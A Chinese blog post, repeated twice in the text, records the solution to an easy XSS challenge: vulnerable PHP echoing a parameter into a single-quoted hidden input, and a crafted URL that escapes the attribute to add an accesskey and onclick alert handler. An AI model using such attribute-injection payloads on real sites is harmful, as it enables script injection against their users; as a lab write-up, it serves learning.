XSS 练习题记录
2017-08-25 11:20
211 查看
今天看到网上有个XSS挑战赛的,我就去参加了,当做学习。
先记录一下解题过程
找了一体解题人数最多的,也就是最简单的题目。
源码
<?php
header('X-XSS-Protection:0');
header('Content-Type:text/html;charset=utf-8');
?>
<head>
<meta http-equiv="x-ua-compatible" content="IE=10">
</head>
<body>
<form action=''>
<input type='hidden' name='token' value='<?php
echo htmlspecialchars($_GET['token']); ?>'>
<input type='submit'>
</body>
之前做过类似的htmlspecialchars会让获取的js不执行,但是遇到单引号就GG了
还有这个type='hidden'是一个隐藏页面。得=想办法激活。
网上查询发现可以设置快捷键
于是构造URL http://xxxxx/xss14.php?token=%27%20accesskey=X%20onclick=alert%28/xss/%29%20%27
成功过关
先记录一下解题过程
找了一体解题人数最多的,也就是最简单的题目。
源码
<?php
header('X-XSS-Protection:0');
header('Content-Type:text/html;charset=utf-8');
?>
<head>
<meta http-equiv="x-ua-compatible" content="IE=10">
</head>
<body>
<form action=''>
<input type='hidden' name='token' value='<?php
echo htmlspecialchars($_GET['token']); ?>'>
<input type='submit'>
</body>
之前做过类似的htmlspecialchars会让获取的js不执行,但是遇到单引号就GG了
还有这个type='hidden'是一个隐藏页面。得=想办法激活。
网上查询发现可以设置快捷键
于是构造URL http://xxxxx/xss14.php?token=%27%20accesskey=X%20onclick=alert%28/xss/%29%20%27
成功过关
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 记录存在 XSS漏洞的网站列表
- 【嵌入式系统学习记录】练习题:设计一个洗牌发牌的程序;(随机产生52个不同的数)
- xss 表单劫持(from通用明文记录)
- [华为机试练习题]36.简单错误记录
- 记录这些年遇到的XSS
- 【练习题】每隔1秒向文件中写入一行记录
- XSS----payload,绕过,xss小游戏记录
- 曾经一个XSS洞构造,做个记录
- xss 记录cookie
- XSS初学记录
- 牛客网关于数组的练习题记录
- XSS挑战之旅 解题记录
- Java -Xms -Xmx -Xss -XX:MaxNewSize -XX:MaxPermSize含义记录
- XSS quiz练习题做题过程及感悟
- 练习题记录
- [华为机试练习题]36.简单错误记录
- 【学习记录】练习题-二分查找
- google的xss游戏,过时,蛋疼自己记录
- SQL学习-sqlzoo练习题记录(1)
- SQL学习-sqlzoo练习题记录(2)